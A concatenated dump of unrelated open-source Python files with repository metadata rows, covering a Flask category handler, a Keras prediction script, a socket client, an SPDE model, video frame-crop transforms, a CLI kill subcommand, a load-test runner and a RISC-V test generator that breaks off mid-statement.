            db.session.commit()
        except Exception as e:
            current_app.logger.error(e)
            db.session.rollback()
            return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
        return jsonify(errno=RET.OK, errmsg="保存数据成功")
    else:
        # no category id: add a new category
        try:
            new_category = Category()
            new_category.id = category_id
            new_category.name = category_name
            db.session.add(new_category)
            db.session.commit()
        except Exception as e:
            current_app.logger.error(e)
            db.session.rollback()
            return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
        return jsonify(errno=RET.OK, errmsg="保存数据成功")
28.729783
87
0.604696
0
0
0
0
14,794
0.948212
0
0
3,167
0.202987
4c3438c0b1046ec22f1ab42437a0d08677dfe6f2
2,839
py
Python
src/predict_model.py
Swati17293/outlet-prediction
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
[ "MIT" ]
1
2020-10-28T00:05:31.000Z
2020-10-28T00:05:31.000Z
src/predict_model.py
Swati17293/outlet-prediction
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
[ "MIT" ]
null
null
null
src/predict_model.py
Swati17293/outlet-prediction
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
[ "MIT" ]
1
2021-12-09T14:36:54.000Z
2021-12-09T14:36:54.000Z
# Answer Generation
import csv
import os

import numpy as np
from keras.models import *
from keras.models import Model
from keras.preprocessing import text


def load_model():
    print('\nLoading model...')
    # load json and create model
    json_file = open('models/MODEL.json', 'r')
    loaded_model_json = json_file.read()
    json_file.close()
    gate_model = model_from_json(loaded_model_json)
    # load weights into new model
    gate_model.load_weights('models/MODEL.h5', by_name=True)
    return gate_model


train_ans, anslist = [], []


def ans_vec():
    anslist = []
    dataset = ['Train']
    for data in dataset:
        f = open('data/raw/' + data + '.csv')
        lines = csv.reader(f)
        for line in lines:
            source_uri = line[4]
            anslist.append(source_uri)
        f.close()
    return anslist


def generate_save_ans():
    dic = 3
    anslist = ans_vec()
    gate_model = load_model()

    test_title_feature = np.load('data/vectorized/Test_title.npy')
    test_summary_feature = np.load('data/vectorized/Test_summary.npy')

    tokenizer_a = text.Tokenizer(num_words=dic + 1)
    tokenizer_a.fit_on_texts(anslist)
    dic_a = tokenizer_a.word_index
    ind_a = {value: key for key, value in dic_a.items()}

    num_test = len(open('data/raw/Test.csv', 'r').readlines())

    ans = gate_model.predict([test_title_feature, test_summary_feature])

    fp = open('reports/Test.ans', 'w')
    for h in range(num_test):
        i = h
        if np.argmax(ans[i][0], axis=0) == 0:
            fp.write('indiatimes\n')  # Low frequency words are replaced with "indiatimes"
        else:
            for j in range(dic):
                an = np.argmax(ans[i][j], axis=0)
                if j != dic - 1:
                    anext = np.argmax(ans[i][j + 1], axis=0)
                    if an != 0 and anext != 0:  # Words before and after
                        if an == anext:
                            fp.write('')  # Delete duplicate words
                        else:
                            fp.write(ind_a[an] + ' ')
                    elif an != 0 and anext == 0:
                        fp.write(ind_a[an])
                    elif an == 0 and anext != 0:
                        fp.write(ind_a[anext])
                    else:
                        fp.write('')
                else:
                    if an != 0:
                        fp.write(ind_a[an] + '\n')
                    else:
                        fp.write('\n')
    fp.close()


def main():
    load_model()
    print('\n\nGenerating answers...')
    if not os.path.exists('reports'):
        os.mkdir('reports')
    if not os.path.isfile('reports/Test.ans'):
        generate_save_ans()
    print('\nAnswer generation complete...\n\n')


if __name__ == "__main__":
    main()
27.038095
89
0.534343
0
0
0
0
0
0
0
0
503
0.177175
4c353955c991e91d2a8ac820fc6be7fa23bb7348
716
py
Python
tools/client.py
Alisa1114/yolov4-pytorch-1
5dd8768f2eef868c9ee4588818350d4e1b50b98f
[ "MIT" ]
null
null
null
tools/client.py
Alisa1114/yolov4-pytorch-1
5dd8768f2eef868c9ee4588818350d4e1b50b98f
[ "MIT" ]
null
null
null
tools/client.py
Alisa1114/yolov4-pytorch-1
5dd8768f2eef868c9ee4588818350d4e1b50b98f
[ "MIT" ]
null
null
null
# -*- coding: UTF-8 -*-
from socket import *


def client():
    # lab machine
    # serverip = '120.126.151.182'
    # serverport = 8887

    # local testing
    serverip = '127.0.0.1'
    serverport = 8888
    client = socket(AF_INET, SOCK_STREAM)
    client.connect((serverip, serverport))
    address_file = open('tools/address.txt', 'r')
    address = address_file.read()
    client.send(address.encode())
    print(client.recv(1024).decode())


if __name__ == '__main__':
    client()

    # buffer = 'POST /post HTTP/1.1\r\n'
    # buffer += 'Content-Type:application/json\r\n'
    # buffer += 'Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n'
    # buffer += 'Address : ' + address + '\r\n'
    # buffer += '\r\n'
    # print(buffer)
    # message = "國立台北大學世界第一:)"
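For local testing, client() needs a peer listening on 127.0.0.1:8888. This is a minimal companion sketch, not part of the repository (the real lab server at 120.126.151.182 is external):

# Minimal companion server for testing client() locally.
from socket import *

def server():
    srv = socket(AF_INET, SOCK_STREAM)
    srv.bind(('127.0.0.1', 8888))
    srv.listen(1)
    conn, addr = srv.accept()
    data = conn.recv(4096).decode()          # the contents of tools/address.txt
    print('received from', addr, ':', data)
    conn.send('ok'.encode())                 # the reply that client() prints
    conn.close()
    srv.close()

if __name__ == '__main__':
    server()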
25.571429
64
0.624302
0
0
0
0
0
0
0
0
410
0.539474
4c35e02888592e1186585689132cd3d10b0f4a6d
13,039
py
Python
dapy/models/kuramoto_sivashinsky.py
hassaniqbal209/data-assimilation
ec52d655395dbed547edf4b4f3df29f017633f1b
[ "MIT" ]
11
2020-07-29T07:46:39.000Z
2022-03-17T01:28:07.000Z
dapy/models/kuramoto_sivashinsky.py
hassaniqbal209/data-assimilation
ec52d655395dbed547edf4b4f3df29f017633f1b
[ "MIT" ]
1
2020-07-14T11:49:17.000Z
2020-07-29T07:43:22.000Z
dapy/models/kuramoto_sivashinsky.py
hassaniqbal209/data-assimilation
ec52d655395dbed547edf4b4f3df29f017633f1b
[ "MIT" ]
10
2020-07-14T11:34:24.000Z
2022-03-07T09:08:12.000Z
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts. Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally chaotic dynamics. References: 1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves in dissipative media far from thermal equilibrium. Progress in Theoretical Physcs, 55 (1976) pp. 356–369. 2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar flames I. Derivation of basic equations. Acta Astronomica, 4 (1977) pp. 1177–1206. """ from typing import Union, Optional, Sequence, Callable import numpy as np from dapy.models.base import AbstractDiagonalGaussianModel from dapy.models.spatial import SpatiallyExtendedModelMixIn from dapy.integrators.etdrk4 import FourierETDRK4Integrator from dapy.models.transforms import ( OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array, ) class FourierLaminarFlameModel(AbstractDiagonalGaussianModel): """Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts. This model class represents the state field by its the Fourier coefficients rather than values of the state field at the spatial mesh points. Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally chaotic dynamics. The governing stochastic partial differential equation (SPDE) is dX = -(∂⁴X/∂s⁴ + ∂²X/∂s² + X * ∂X/∂s + γ * X) dt + κ ⊛ dW where `s` is the spatial coordinate in a periodic domain `[0, S)`, `t` the time coordinate, `X(s, t)` the state field process, `γ` a coefficient controlling the degree of damping in the dynamics, `W(s, t)` a space-time white noise process, `κ(s)` a spatial smoothing kernel and `⊛` indicates circular convolution in the spatial coordinate. Using a spectral spatial discretisation, this corresponds to a non-linear system of stochastic differential equations (SDEs) in the Fourier coefficients X̃ₖ dX̃ₖ = (ωₖ² - ωₖ⁴ - γ) * X̃ₖ + (i * ωₖ / 2) * DFTₖ(IDFT(X̃)²) + κ̃ₖ * dW̃ₖ where `W̃ₖ` is a complex-valued Wiener process, `κ̃ₖ` the kth Fourier coefficient of the smoothing kernel `κ`, `ωₖ = 2 * pi * k / S` the kth spatial frequency and `i` the imaginary unit. A Fourier-domain exponential time-differencing integrator with 4th order Runge-- Kutta updates for non-linear terms [3, 4] is used to integrate the deterministic component of the SDE dynamics and an Euler-Maruyama discretisation used for the Wiener process increment. The smoothing kernel Fourier coefficients are assumed to be κ̃ₖ = σ * exp(-ωₖ² * ℓ²) * √(M / S) where `σ` is a parameter controlling the amplitude and `ℓ` a parameter controlling the length scale. References: 1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves in dissipative media far from thermal equilibrium. Progress in Theoretical Physcs, 55 (1976) pp. 356–369. 2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar flames I. Derivation of basic equations. Acta Astronomica, 4 (1977) pp. 1177–1206. 3. Kassam, Aly-Khan and Trefethen, Lloyd N. Fourth-order time-stepping for stiff PDEs. SIAM Journal on Scientific Computing 26.4 (2005): 1214-1233. 4. Cox, Steven M. and Matthews, Paul C. Exponential time differencing for stiff systems. Journal of Computational Physics 176.2 (2002): 430-455. 
""" def __init__( self, dim_state: int = 512, observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8), observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None, time_step: float = 0.25, domain_extent: float = 32 * np.pi, damping_coeff: float = 1.0 / 6, observation_noise_std: float = 0.5, initial_state_amplitude: float = 1.0, state_noise_amplitude: float = 1.0, state_noise_length_scale: float = 1.0, num_roots_of_unity_etdrk4_integrator: int = 16, **kwargs ): """ Args: dim_state: Dimension of state which is equivalent here to number of mesh points in spatial discretization. observation_space_indices: Slice or sequence of integers specifying spatial mesh node indices (indices in to state vector) corresponding to observation points. observation_function: Function to apply to subsampled state field to compute mean of observation(s) given state(s) at a given time index. Defaults to identity function in first argument. time_step: Integrator time step. domain_extent: Extent (size) of spatial domain. damping_coeff: Coefficient (`γ` in description above) controlling degree of damping in dynamics. observation_noise_std: Standard deviation of additive Gaussian noise in observations. Either a scalar or array of shape `(dim_observation,)`. Noise in each dimension assumed to be independent i.e. a diagonal noise covariance. initial_state_amplitude: Amplitude scale parameter for initial random state field. Larger values correspond to larger magnitude values for the initial state. state_noise_amplitude: Amplitude scale parameter for additive state noise in model dynamics. Larger values correspond to larger magnitude additive noise in the state field. state_noise_length_scale: Length scale parameter for smoothed noise used to generate initial state and additive state noise fields. Larger values correspond to smoother fields. num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in approximating contour integrals in exponential time-differencing plus fourth-order Runge Kutta integrator. 
""" assert dim_state % 2 == 0, "State dimension `dim_state` must be even" self.time_step = time_step self.observation_space_indices = observation_space_indices self.observation_function = observation_function spatial_freqs = np.arange(dim_state // 2 + 1) * 2 * np.pi / domain_extent spatial_freqs_sq = spatial_freqs ** 2 spatial_freqs[dim_state // 2] = 0 state_noise_kernel = ( (time_step) ** 0.5 * state_noise_amplitude * np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2) * (dim_state / domain_extent) ** 0.5 ) state_noise_std = rfft_coeff_to_real_array( state_noise_kernel + 1j * state_noise_kernel, False ) initial_state_kernel = ( initial_state_amplitude * np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2) * (dim_state / domain_extent) ** 0.5 ) initial_state_std = rfft_coeff_to_real_array( initial_state_kernel + 1j * initial_state_kernel, False ) def linear_operator(freqs, freqs_sq): return freqs_sq - freqs_sq ** 2 - damping_coeff def nonlinear_operator(v, freqs, freqs_sq): return ( -0.5j * freqs * fft.rfft(fft.irfft(v, norm="ortho") ** 2, norm="ortho") ) self.integrator = FourierETDRK4Integrator( linear_operator=linear_operator, nonlinear_operator=nonlinear_operator, num_mesh_point=dim_state, domain_size=domain_extent, time_step=time_step, num_roots_of_unity=num_roots_of_unity_etdrk4_integrator, ) if observation_function is None: dim_observation = np.zeros(dim_state)[observation_space_indices].shape[0] else: dim_observation = observation_function( np.zeros(dim_state)[observation_space_indices], 0 ).shape[0] super().__init__( dim_state=dim_state, dim_observation=dim_observation, initial_state_std=initial_state_std, initial_state_mean=np.zeros(dim_state), state_noise_std=state_noise_std, observation_noise_std=observation_noise_std, **kwargs ) def _next_state_mean(self, states: np.ndarray, t: int) -> np.ndarray: return rfft_coeff_to_real_array( self.integrator.step(real_array_to_rfft_coeff(states)) ) def _observation_mean(self, states: np.ndarray, t: int) -> np.ndarray: subsampled_states = fft.irfft(real_array_to_rfft_coeff(states), norm="ortho")[ ..., self.observation_space_indices ] if self.observation_function is None: return subsampled_states else: return self.observation_function(subsampled_states, t) class SpatialLaminarFlameModel( SpatiallyExtendedModelMixIn, OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, FourierLaminarFlameModel, ): """Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts. This model class represents the state field by its values at the spatial mesh points rather than the corresponding Fourier coefficients. For more details see the docstring of `FourierLaminarFlameModel`. """ def __init__( self, dim_state: int = 512, observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8), observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None, time_step: float = 0.25, domain_extent: float = 32 * np.pi, damping_coeff: float = 1.0 / 6, observation_noise_std: float = 0.5, initial_state_amplitude: float = 1.0, state_noise_amplitude: float = 1.0, state_noise_length_scale: float = 1.0, num_roots_of_unity_etdrk4_integrator: int = 16, ): """ Args: dim_state: Dimension of state which is equivalent here to number of mesh points in spatial discretization. observation_space_indices: Slice or sequence of integers specifying spatial mesh node indices (indices in to state vector) corresponding to observation points. 
observation_function: Function to apply to subsampled state field to compute mean of observation(s) given state(s) at a given time index. Defaults to identity function in first argument. time_step: Integrator time step. domain_extent: Extent (size) of spatial domain. damping_coeff: Coefficient (`γ` in description above) controlling degree of damping in dynamics. observation_noise_std: Standard deviation of additive Gaussian noise in observations. Either a scalar or array of shape `(dim_observation,)`. Noise in each dimension assumed to be independent i.e. a diagonal noise covariance. initial_state_amplitude: Amplitude scale parameter for initial random state field. Larger values correspond to larger magnitude values for the initial state. state_noise_amplitude: Amplitude scale parameter for additive state noise in model dynamics. Larger values correspond to larger magnitude additive noise in the state field. state_noise_length_scale: Length scale parameter for smoothed noise used to generate initial state and additive state noise fields. Larger values correspond to smoother fields. num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in approximating contour integrals in exponential time-differencing plus fourth-order Runge Kutta integrator. """ super().__init__( dim_state=dim_state, observation_space_indices=observation_space_indices, observation_function=observation_function, time_step=time_step, domain_extent=domain_extent, damping_coeff=damping_coeff, observation_noise_std=observation_noise_std, initial_state_amplitude=initial_state_amplitude, state_noise_amplitude=state_noise_amplitude, state_noise_length_scale=state_noise_length_scale, num_roots_of_unity_etdrk4_integrator=num_roots_of_unity_etdrk4_integrator, mesh_shape=(dim_state,), domain_extents=(domain_extent,), domain_is_periodic=True, observation_node_indices=observation_space_indices, )
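Construction is fully determined by the signatures above; a minimal instantiation sketch follows. Simulation and filtering methods live in the dapy base classes, which are outside this file, so only the constructor call is shown:

# Instantiation sketch; any sampling/filtering calls would come from the
# dapy base classes not shown in this file.
import numpy as np
from dapy.models.kuramoto_sivashinsky import SpatialLaminarFlameModel

model = SpatialLaminarFlameModel(
    dim_state=256,               # number of spatial mesh points (must be even)
    time_step=0.25,
    domain_extent=32 * np.pi,
    observation_noise_std=0.5,
)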
47.072202
88
0.666692
12,126
0.923112
0
0
0
0
0
0
7,572
0.576431
4c3723af9b53c7e19a14d4d5a300a57c775f6c8c
553
py
Python
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
"""Utiltiy functions for working with Myo Armband data.""" from setuptools import setup, find_packages setup(name='myo_helper', version='0.1', description='Utiltiy functions for working with Myo Armband data', author='Lif3line', author_email='[email protected]', license='MIT', packages=find_packages(), url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo install_requires=[ 'scipy', 'sklearn', 'numpy' ], keywords='myo emg')
27.65
85
0.631103
0
0
0
0
0
0
0
0
272
0.491863
4c3bcf54b28a72322eb20b3cefe8c6d28943d5e4
1,030
py
Python
demos/restful-users/index.py
karldoenitz/karlooper
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
[ "MIT" ]
161
2016-05-17T12:44:07.000Z
2020-07-30T02:18:34.000Z
demos/restful-users/index.py
karldoenitz/karlooper
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
[ "MIT" ]
6
2016-08-29T01:40:26.000Z
2017-12-29T09:20:41.000Z
demos/restful-users/index.py
karldoenitz/karlooper
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
[ "MIT" ]
16
2016-06-27T02:56:54.000Z
2019-08-08T08:18:48.000Z
# -*-encoding:utf-8-*-
import os

from karlooper.web.application import Application
from karlooper.web.request import Request


class UsersHandler(Request):
    def get(self):
        return self.render("/user-page.html")


class UserInfoHandler(Request):
    def post(self):
        print(self.get_http_request_message())
        size = self.get_parameter("user_size", 0)
        size = int(size)
        user_list = [{"name": "name_%d" % i, "gender": "male", "age": i + 10} for i in range(size)]
        result = {
            "status": 0,
            "message": "OK",
            "data": user_list
        }
        return self.response_as_json(result)


url_mapping = {
    "/users": UsersHandler,
    "/user-info": UserInfoHandler
}

settings = {
    "template": os.getcwd() + "/templates",
    "static": os.getcwd() + "/templates",
    "log_enable": False,
    "debug": True
}

if __name__ == '__main__':
    application = Application(url_mapping, settings=settings)
    application.listen(port=8080)
    application.run()
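With the app running on port 8080, the /user-info handler can be exercised with a POST; a hypothetical smoke test, assuming get_parameter reads form-encoded POST fields (the requests call is illustrative, not part of the demo):

# Hypothetical smoke test for the running demo.
import requests

resp = requests.post("http://127.0.0.1:8080/user-info", data={"user_size": 2})
print(resp.json())
# expected shape: {"status": 0, "message": "OK", "data": [
#     {"name": "name_0", "gender": "male", "age": 10},
#     {"name": "name_1", "gender": "male", "age": 11}]}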
23.409091
99
0.61165
524
0.508738
0
0
0
0
0
0
202
0.196117
4c3c325909dda45d25ada2b46ed9a46e19b99dfc
4,154
py
Python
temporal_transforms.py
LijiangLong/3D-ResNets-PyTorch
89d2cba0b52d55aaa834635a81c172bc38771cd3
[ "MIT" ]
null
null
null
temporal_transforms.py
LijiangLong/3D-ResNets-PyTorch
89d2cba0b52d55aaa834635a81c172bc38771cd3
[ "MIT" ]
null
null
null
temporal_transforms.py
LijiangLong/3D-ResNets-PyTorch
89d2cba0b52d55aaa834635a81c172bc38771cd3
[ "MIT" ]
null
null
null
import random
import math


class LoopPadding(object):

    def __init__(self, size):
        self.size = size

    def __call__(self, frame_indices):
        out = frame_indices

        for index in out:
            if len(out) >= self.size:
                break
            out.append(index)

        return out


class TemporalBeginCrop(object):
    """Temporally crop the given frame indices at a beginning.

    If the number of frames is less than the size,
    loop the indices as many times as necessary to satisfy the size.

    Args:
        size (int): Desired output size of the crop.
    """

    def __init__(self, size):
        self.size = size

    def __call__(self, frame_indices):
        out = frame_indices[:self.size]

        for index in out:
            if len(out) >= self.size:
                break
            out.append(index)

        return out


class TemporalCenterCrop(object):
    """Temporally crop the given frame indices at a center.

    If the number of frames is less than the size,
    loop the indices as many times as necessary to satisfy the size.

    Args:
        size (int): Desired output size of the crop.
    """

    def __init__(self, size):
        self.size = size

    def __call__(self, frame_indices):
        """
        Args:
            frame_indices (list): frame indices to be cropped.
        Returns:
            list: Cropped frame indices.
        """
        center_index = len(frame_indices) // 2
        begin_index = max(0, center_index - (self.size // 2))
        end_index = min(begin_index + self.size, len(frame_indices))

        out = frame_indices[begin_index:end_index]

        for index in out:
            if len(out) >= self.size:
                break
            out.append(index)

        return out


class TemporalRandomCrop(object):
    """Temporally crop the given frame indices at a random location.

    If the number of frames is less than the size,
    loop the indices as many times as necessary to satisfy the size.

    Args:
        size (int): Desired output size of the crop.
    """

    def __init__(self, size):
        self.size = size

    def __call__(self, frame_indices):
        """
        Args:
            frame_indices (list): frame indices to be cropped.
        Returns:
            list: Cropped frame indices.
        """
        rand_end = max(0, len(frame_indices) - self.size - 1)
        begin_index = random.randint(0, rand_end)
        end_index = min(begin_index + self.size, len(frame_indices))

        out = frame_indices[begin_index:end_index]

        for index in out:
            if len(out) >= self.size:
                break
            out.append(index)

        return out


class TemporalCenterCropFlexible(object):

    def __init__(self, begin=15, step=3, end=108):
        self.begin = begin
        self.step = step
        self.end = end
        assert (end - begin) / step + 1 == 32

    def __call__(self, frame_indices):
        out = frame_indices[slice(self.begin, self.end + 1, self.step)]
        return out


class TemporalCenterRandomCrop(object):
    """Temporally crop the given frame indices at a random location.

    If the number of frames is less than the size,
    loop the indices as many times as necessary to satisfy the size.

    Args:
        size (int): Desired output size of the crop.
    """

    def __init__(self, size):
        self.size = size

    def __call__(self, frame_indices):
        """
        Args:
            frame_indices (list): frame indices to be cropped.
        Returns:
            list: Cropped frame indices.
        """
        spacing = int((len(frame_indices) - self.size) / 2)  # i.e. if 120 and 90: = 30
        offset = random.randint(-1 * int(spacing / 2) + 1, int(spacing / 2) - 1)  # i.e if 120 and 90, -14 to 14
        begin_index = int(len(frame_indices) / 2) - int(self.size / 2) + offset  # i.e. 120: 60 - 45 + offset (-1 to 29)
        end_index = begin_index + self.size

        out = frame_indices[begin_index:end_index]

        for index in out:
            if len(out) >= self.size:
                break
            out.append(index)

        return out
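All of these transforms share the same call contract: a list of frame indices in, a list of exactly `size` indices out. A short usage sketch (assumes the classes are importable from this temporal_transforms module):

# Usage sketch for the transforms above.
frame_indices = list(range(120))      # e.g. a 120-frame video clip

crop = TemporalCenterCrop(16)
clip = crop(frame_indices)            # 16 consecutive indices centered on frame 60
assert len(clip) == 16

short = LoopPadding(16)([0, 1, 2])    # short clips are looped up to size
assert short == [0, 1, 2, 0, 1, 2, 0, 1, 2, 0, 1, 2, 0, 1, 2, 0]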
26.974026
115
0.590515
4,112
0.989889
0
0
0
0
0
0
1,556
0.374579
4c3c84ef8550fb8c1fe9332f31bf0fbd72087616
1,206
py
Python
cli/waiter/subcommands/kill.py
geofft/waiter
0e10cd497c2c679ea43231866d9f803c3fed5d77
[ "Apache-2.0" ]
null
null
null
cli/waiter/subcommands/kill.py
geofft/waiter
0e10cd497c2c679ea43231866d9f803c3fed5d77
[ "Apache-2.0" ]
null
null
null
cli/waiter/subcommands/kill.py
geofft/waiter
0e10cd497c2c679ea43231866d9f803c3fed5d77
[ "Apache-2.0" ]
null
null
null
from waiter.action import process_kill_request
from waiter.util import guard_no_cluster, check_positive


def kill(clusters, args, _, __):
    """Kills the service(s) using the given token name."""
    guard_no_cluster(clusters)
    token_name_or_service_id = args.get('token-or-service-id')
    is_service_id = args.get('is-service-id', False)
    force_flag = args.get('force', False)
    timeout_secs = args['timeout']
    success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs)
    return 0 if success else 1


def register(add_parser):
    """Adds this sub-command's parser and returns the action function"""
    parser = add_parser('kill', help='kill services')
    parser.add_argument('token-or-service-id')
    parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true')
    parser.add_argument('--service-id', '-s', help='kill by service id instead of token', dest='is-service-id',
                        action='store_true')
    parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete', type=check_positive,
                        default=30)
    return kill
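register() follows the usual argparse sub-command pattern: the CLI hands in `subparsers.add_parser` and gets back the action to dispatch. A hypothetical wiring sketch (the real waiter entry point lives elsewhere and is not shown here):

# Hypothetical wiring showing how register()/kill() plug into argparse.
import argparse

parser = argparse.ArgumentParser(prog='waiter')
subparsers = parser.add_subparsers()
action = register(subparsers.add_parser)   # returns the kill function

args = vars(parser.parse_args(['kill', 'my-token', '--timeout', '60']))
# kill() reads its inputs via dict lookups, e.g. args.get('token-or-service-id');
# exit_code = action(clusters, args, None, None) would then dispatch the kill.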
46.384615
115
0.694859
0
0
0
0
0
0
0
0
421
0.349088
4c3ccdaafeb79fdce0197fde1a5c4f83054573ab
3,338
py
Python
a2t/src/a2t.py
syeda-khurrath/fabric8-analytics-common
421f7e27869c5695ed73b51e6422e097aba00108
[ "Apache-2.0" ]
null
null
null
a2t/src/a2t.py
syeda-khurrath/fabric8-analytics-common
421f7e27869c5695ed73b51e6422e097aba00108
[ "Apache-2.0" ]
4
2019-05-20T08:27:47.000Z
2019-05-20T08:29:57.000Z
a2t/src/a2t.py
codeready-analytics/fabric8-analytics-common
a763c5534d601f2f40a0f02c02914c49ea23669d
[ "Apache-2.0" ]
1
2020-10-05T21:12:44.000Z
2020-10-05T21:12:44.000Z
"""The main module of the Analytics API Load Tests tool. Copyright (c) 2019 Red Hat Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import sys import os from time import time from fastlog import log from csv_reader import read_csv_as_dicts from setup import setup from cliargs import cli_parser from component_analysis import ComponentAnalysis from stack_analysis import StackAnalysis from test_runner import start_tests # current version of this tool VERSION_MAJOR = 1 VERSION_MINOR = 0 def check_api_endpoint(api): """Check that some API endpoint is callable.""" log.info("Checking: core API endpoint") with log.indent(): if not api.is_api_running(): log.error("Fatal: tested system is not available") sys.exit(1) else: log.success("ok") def check_auth_token(api): """Check the authorization token for the core API.""" log.info("Checking: authorization token for the core API") with log.indent(): if api.check_auth_token_validity(): log.success("ok") else: log.error("Fatal: wrong token(?)") sys.exit(1) def check_system(api): """Check if all system endpoints are available and that tokens are valid.""" # try to access system endpoints log.info("System check") with log.indent(): check_api_endpoint(api) check_auth_token(api) def show_version(): """Show A2T version.""" print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR)) def main(): """Entry point to the Analytics API Load Tests.""" log.setLevel(log.INFO) cli_arguments = cli_parser.parse_args() if cli_arguments.version: show_version() sys.exit(0) else: cfg = setup(cli_arguments) coreapi_url = os.environ.get('F8A_SERVER_API_URL', None) component_analysis = ComponentAnalysis(coreapi_url, cfg["access_token"], cfg["user_key"], True) stack_analysis = StackAnalysis(coreapi_url, cfg["access_token"], cfg["user_key"], True) check_system(component_analysis) try: tests = read_csv_as_dicts(cfg["input_file"]) except Exception as e: log.error("Test description can not be read") log.error(e) sys.exit(0) t1 = time() tags = cfg["tags"] start_tests(cfg, tests, tags, component_analysis, stack_analysis) t2 = time() log.info("Start time: {}".format(t1)) log.info("End time: {}".format(t2)) log.info("Duration: {}".format(t2 - t1)) if __name__ == "__main__": # execute only if run as a script main()
30.345455
90
0.65698
0
0
0
0
0
0
0
0
1,418
0.424805
4c3d2c0aac2c057e54b3e25d8827904204518172
3,568
py
Python
riscv_ctg/ctg.py
Giri2801/riscv-ctg
a90e03f0856bbdd106c3f6d51815af94707e711e
[ "BSD-3-Clause" ]
null
null
null
riscv_ctg/ctg.py
Giri2801/riscv-ctg
a90e03f0856bbdd106c3f6d51815af94707e711e
[ "BSD-3-Clause" ]
null
null
null
riscv_ctg/ctg.py
Giri2801/riscv-ctg
a90e03f0856bbdd106c3f6d51815af94707e711e
[ "BSD-3-Clause" ]
null
null
null
# See LICENSE.incore file for details

import os,re
import multiprocessing as mp

import time
import shutil
from riscv_ctg.log import logger
import riscv_ctg.utils as utils
import riscv_ctg.constants as const
from riscv_isac.cgf_normalize import expand_cgf
from riscv_ctg.generator import Generator
from math import *
from riscv_ctg.__init__ import __version__

def create_test(usage_str, node,label,base_isa,max_inst):
    global op_template
    global randomize
    global out_dir
    global xlen
    flen = 0
    if 'opcode' not in node:
        return
    if 'ignore' in node:
        logger.info("Ignoring :" + str(label))
        if node['ignore']:
            return
    for opcode in node['opcode']:
        op_node=None
        if opcode not in op_template:
            for op,foo in op_template.items():
                if op!='metadata' and foo['std_op'] is not None and opcode==foo['std_op']:
                    op_node = foo
                    break
        else:
            op_node = op_template[opcode]

        if op_node is None:
            logger.warning("Skipping :" + str(opcode))
            return
        if xlen not in op_node['xlen']:
            logger.warning("Skipping {0} since it's not supported in current XLEN:".format(opcode))
            return
        if 'flen' in op_node:
            if '.d' in opcode:
                flen = 64
            elif '.s' in opcode:
                flen = 32
            else:
                flen = op_node['flen'][0]
            #if flen not in op_node['flen']:
            #    return
        fprefix = os.path.join(out_dir,str(label))
        logger.info('Generating Test for :' + str(label) +"-" + opcode)
        formattype  = op_node['formattype']
        gen = Generator(formattype,op_node,opcode,randomize,xlen,flen,base_isa)
        op_comb = gen.opcomb(node)
        val_comb = gen.valcomb(node)
        instr_dict = gen.correct_val(gen.testreg(gen.swreg(gen.gen_inst(op_comb, val_comb, node))))
        logger.info("Writing tests for :"+str(label))
        my_dict = gen.reformat_instr(instr_dict)
        gen.write_test(fprefix,node,label,my_dict, op_node, usage_str, max_inst)

def ctg(verbose, out, random ,xlen_arg, cgf_file,num_procs,base_isa, max_inst,list_duplicate):
    global op_template
    global randomize
    global out_dir
    global xlen
    logger.level(verbose)
    logger.info('****** RISC-V Compliance Test Generator {0} *******'.format(__version__ ))
    logger.info('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')
    logger.info('All Rights Reserved.')
    logger.info("Copying env folder to Output directory.")
    env_dir = os.path.join(out,"env")
    if not os.path.exists(env_dir):
        shutil.copytree(const.env,env_dir)
    xlen = int(xlen_arg)
    out_dir = out
    randomize = random
    mytime = time.asctime(time.gmtime(time.time())) + ' GMT'
    cgf_argument = ''
    for cf in cgf_file:
        cgf_argument += '// --cgf {} \\\n'.format(cf)
    randomize_argument = ''
    if random is True:
        randomize_argument = ' \\\n//  --randomize'
    usage_str = const.usage.safe_substitute(base_isa=base_isa, \
